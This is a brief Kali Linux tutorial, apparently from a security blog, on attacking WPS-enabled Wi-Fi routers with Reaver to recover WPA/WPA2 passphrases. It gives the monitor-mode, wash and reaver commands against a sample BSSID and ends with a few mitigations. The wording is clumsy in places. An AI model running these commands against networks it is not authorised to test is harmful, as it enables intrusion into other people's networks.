In this Kali Linux Tutorial, we are to work with Reaver. Reaver has been designed to be a handy and effective tool to attack Wi-Fi Protected Setup (WPS) register PINs keeping in mind the tip goal to recover WPA/WPA2 passphrases.
Presently hacking WPA/WPA2 is exceptionally a tedious job. A dictionary attack could take days, and still will not succeed.
WPS-functionality always stopped to work somewhere between 2 and 150 failed authentication attempts. The functionality did not even return after several hours. I would consider this a bug in the firmware which causes a DoS rather than lock-down functionality. Researchers said.
All major suppliers (counting Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL, and Technicolor) have WPS-affirmed gadgets, completely different sellers (eg. TP-Link) send gadgets with WPS-support that aren’t WPS-certified.WPS is enabled default by all devices.
Also Read Aircrack-ng (WiFI Password Cracker)
Penetration testing with Reaver – Kali Linux Tutorial
First, we should setup our Wireless device in Monitoring mode.
airmon-ng start wlan0
You should notice for the device setup in the Monitor mode wlan0mon.
Now we can see the BSSID of the devices that near to us and you can also use wash -i wlan0mon to display all WPS enabled WiFi networks.
We have gathered all the required information, now time to attack from Reaver.
reaver -i wlan0mon -b DC:EF:09:17:9A:2C –vvv -K 1
-i Indicates interface
-b BSSID of the target AP
-K Run pixiewps
It will go on scanning with all WPS pin available.
If it finds a matching PIN it will go and be exploiting it.
- Enable MAC address filtering.
- Disable WPS.
- Physically Protect the Router.